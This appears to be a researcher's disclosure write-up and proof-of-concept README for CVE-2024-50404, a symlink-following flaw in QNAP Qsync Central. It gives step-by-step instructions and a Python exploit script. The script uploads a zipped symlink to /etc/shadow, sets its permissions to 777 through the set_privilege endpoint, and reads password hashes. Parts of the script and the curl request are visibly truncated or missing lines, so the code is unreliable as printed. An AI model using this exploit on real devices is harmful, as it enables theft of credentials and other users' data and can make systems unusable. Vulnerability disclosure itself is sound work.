# CVE-2024-50404
- https://www.qnap.com/en/security-advisory/qsa-24-48
- https://www.cve.org/CVERecord?id=2024-50404
"A link following vulnerability has been reported to affect Qsync Central. If exploited, the vulnerability could allow remote attackers who have gained user access to traverse the file system to unintended locations."
__Date of Discovery:__ 22 April 2024
__Date of Fix:__ 7 December 2024
__Affected Version(s):__ Qsync Central 4.4.x
__Fixed Version(s):__ Qsync Central (2024/08/19) and later
__Access Permissions:__ Regular user with file upload permission
It is possible to upload a symlink through a ZIP file and read the file where the uploaded symlink points to.
Furthermore the file permissions of the symlink target can be modified.
An attacker with privileges of a regular user can read data of other users or the password hashes stored in */etc/config/shadow*, which could lead to the compromise of the whole system.
Additionally the attacker could remove the execute permission on important system binaries to make the system unusable.
# Steps to Reproduce
## Read file via symlink
1. Create a symlink and put it into a ZIP file.
``` bash
ln -s /etc/passwd link.txt
zip --symlink pwn.zip link.txt
2. Login as a low-privileged user.
3. Upload the ZIP file into the *.Qsync* folder.

4. Extract the ZIP file by right-clicking and selecting *Extract to /pwn/*.

5. Open the new *pwn* folder, right-click on *link.txt* and select *Open*.
6. Observe that */etc/passwd* is opened in a new tab.

## Modify file permissions via symlink
1. Create a symlink and put it into a zip file.
``` bash
ln -s /etc/shadow link.txt
zip --symlink pwn.zip link.txt
2. Login as a low-privileged user.
3. Upload the ZIP file into the *.Qsync* folder.
4. Extract the ZIP file by right-clicking and selecting *Extract to /pwn/*.
5. Change the permission of the file where the symlink points to by abusing the *set_privilege* function.
Curl Request:
``` bash
curl --path-as-is -i -s -k -X $'GET' -H $'Host:' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer:' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' $''
Burp Request:

You must replace the *sid* parameter in the URL with a valid session id.
6. Open the new *pwn* folder, right-click on *link.txt* and select *Open*.
7. Observe that */etc/shadow* is opened in a new tab.

# Proof of Concept
The following Python script can be used to exploit the vulnerability.
``` python
#!/usr/bin/env python3
from requests import Session
import base64
import os
import re
import time
import urllib3
# adjust following variables
USERNAME = 'victim'
PASSWORD = 'Victim123!'
FILE = '/etc/shadow'
#DEBUG_PROXY = 'http://localhost:8080'
def main() -> None:
session = Session()
#session.proxies.update(http=DEBUG_PROXY, https=DEBUG_PROXY)
session.verify = False
print(f'carefull, privileges of {FILE} are changed to 777! clean up is not implemented')
print('creating zip file')
os.system('rm -f pwned.txt pwn.zip')
os.system(f'ln -s {FILE} pwned.txt')
os.system('zip --symlink pwn.zip pwned.txt')
print('loggin in')
response = session.post(
headers={'Content-type': 'application/x-www-form-urlencoded'},
data={'user': USERNAME, 'serviceKey': '1', 'client_app': 'Web Desktop', 'dont_verify_2sv_again': '0', 'pwd': base64.b64encode(PASSWORD.encode('ascii')).decode('ascii'), 'client_id': '2b491dc6-6542-480d-a3a2-bbe3b433b764'},
assert response.status_code == 200
match = re.search(r'<authSid><!\[CDATA\[(.*?)\]\]></authSid>', response.text)
assert match
sid = match.group(1)
print('uploading zip file')
with open('pwn.zip', 'rb') as file:
upload_file(session, sid, 'pwn.zip', file.read())
print('unpacking zip file')
response = session.post(
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
data={'mode': 'extract_all', 'pwd': '', 'path_mode': 'full', 'extract_file': '/home/.Qsync/pwn.zip', 'code_page': 'UTF-8', 'overwrite': '1', 'dest_path': '/home/.Qsync'},
assert response.status_code == 200
data = response.json()
assert data['status'] == 1
# wait a bit
print('changing privileges on file')
response = session.get(f'{ENDPOINT}/cgi-bin/qsync/qsyncsrv.cgi?func=set_privilege&sid={sid}&source_path=/home/.Qsync/&source_file=pwned.txt&bOwn_w=1&bOwn_r=1&bOwn_x=1&bGroup_r=1&bGroup_w=1&bGroup_x=1&bOther_r=1&bOther_w=1&bOther_x=1')
assert response.status_code == 200
data = response.json()
assert data['status'] == 1
print('read file')
response = session.get(f'{ENDPOINT}/cgi-bin/qsync/qsyncsrv.cgi/pwned.txt?sid={sid}&func=get_viewer&source_path=%2Fhome%2F.Qsync&source_file=pwned.txt')
assert response.status_code == 200
def upload_file(session: Session, sid: str, filename: str, content: bytes) -> None:
# get upload id
response = session.post(f'{ENDPOINT}/cgi-bin/filemanager/utilRequest.cgi', headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}, data={'upload_root_dir': '/home', 'func': 'start_chunked_upload', 'sid': sid})
assert response.status_code == 200
data = response.json()
upload_id = data['upload_id']
assert upload_id
# upload file
response = session.post(
('fileName', (None, filename.encode('ascii'))),
('file', ('blob', content, 'application/octet-stream')),
assert response.status_code == 200
data = response.json()
assert data['status'] == 1
if __name__ == '__main__':
[4.0K] /data/pocs/f9a6a14a0ec1757a27b3ce6cc6c37ebfed4d5cc5
├── [3.9K] file-read-poc.py
├── [7.0K] README.md
└── [4.0K] screenshots
├── [ 53K] etc-passwd.png
├── [ 65K] etc-shadow.png
├── [266K] extract-pwn.zip.png
├── [ 88K] request-burp.png
├── [ 89K] set_privilege_burp.png
└── [261K] upload-pwn.zip.png
1 directory, 8 files
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